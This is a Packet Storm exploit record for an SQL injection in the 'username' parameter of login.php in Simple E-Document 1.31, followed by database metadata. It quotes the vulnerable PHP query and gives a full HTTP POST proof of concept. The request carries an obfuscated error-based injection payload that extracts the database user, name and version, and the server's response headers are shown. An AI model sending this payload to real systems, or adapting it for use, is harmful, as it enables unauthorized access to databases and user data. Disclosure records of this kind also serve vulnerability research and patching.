ID PACKETSTORM:150369
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-11-15T00:00:00
Description
`# Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m
# Software Link: https://datapacket.dl.sourceforge.net/project/simplee-doc/simple_e_document_v_1_31.zip
# Version: 1.31
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# //[PATH]//login.php
# ....
#10 if(!isset($_POST['op'])) $_POST['op']='';
#11 if(!isset($_POST['username'])) $_POST['username']='';
#12 if(!isset($_POST['password'])) $_POST['password']='';
#13 if(!isset($op)) $op='';
#14
#15 $op = $_POST['op'];
#16 $username= stripslashes($_POST['username']);
#17 $password= stripslashes($_POST['password']);
#18 $r_password = md5($password);
#19
#20 $sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";
# ....
# POC:
# 1)
# http://localhost/[PATH]/login.php
#
POST /PATH/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 267
username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 07:44:24 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 241
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
`
{"id": "PACKETSTORM:150369", "bulletinFamily": "exploit", "title": "Simple E-Document 1.31 SQL Injection", "description": "", "published": "2018-11-15T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150369/Simple-E-Document-1.31-SQL-Injection.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "type": "packetstorm", "lastseen": "2018-11-16T02:16:00", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "81d747a28c9ec37bbef60f3ba39d99c7"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "published", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "26e049c1c795997380d9a96ee885aeea"}, {"key": "sourceHref", "hash": "fd5983e1828c90b9e61bce43f0e93da2"}, {"key": "title", "hash": "f5ac7e2d7aaba61d5ac96b730b96bd3d"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "hash": "9f9a0b243ea27d46773f515d07ec6121bc076337f90f7ed1bed0be95312905c3", "viewCount": 282, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-11-16T02:16:00"}, "dependencies": {"references": [], "modified": "2018-11-16T02:16:00"}, "vulnersScore": -0.0}, "objectVersion": "1.3", "sourceHref": "https://packetstormsecurity.com/files/download/150369/simpleedoc131-sql.txt", "sourceData": "`# Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection \n# Dork: N/A \n# Date: 2018-11-14 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m \n# Software Link: https://datapacket.dl.sourceforge.net/project/simplee-doc/simple_e_document_v_1_31.zip \n# Version: 1.31 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# //[PATH]//login.php \n# .... \n#10 if(!isset($_POST['op'])) $_POST['op']=''; \n#11 if(!isset($_POST['username'])) $_POST['username']=''; \n#12 if(!isset($_POST['password'])) $_POST['password']=''; \n#13 if(!isset($op)) $op=''; \n#14 \n#15 $op = $_POST['op']; \n#16 $username= stripslashes($_POST['username']); \n#17 $password= stripslashes($_POST['password']); \n#18 $r_password = md5($password); \n#19 \n#20 $sql = \"SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'\"; \n# .... \n \n# POC: \n# 1) \n# http://localhost/[PATH]/login.php \n# \nPOST /PATH/login.php HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 267 \nusername=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' \nHTTP/1.1 200 OK \nDate: Wed, 14 Nov 2018 07:44:24 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nContent-Length: 241 \nKeep-Alive: timeout=5, max=97 \nConnection: Keep-Alive \nContent-Type: text/html; charset=UTF-8 \n \n \n`\n"}
{}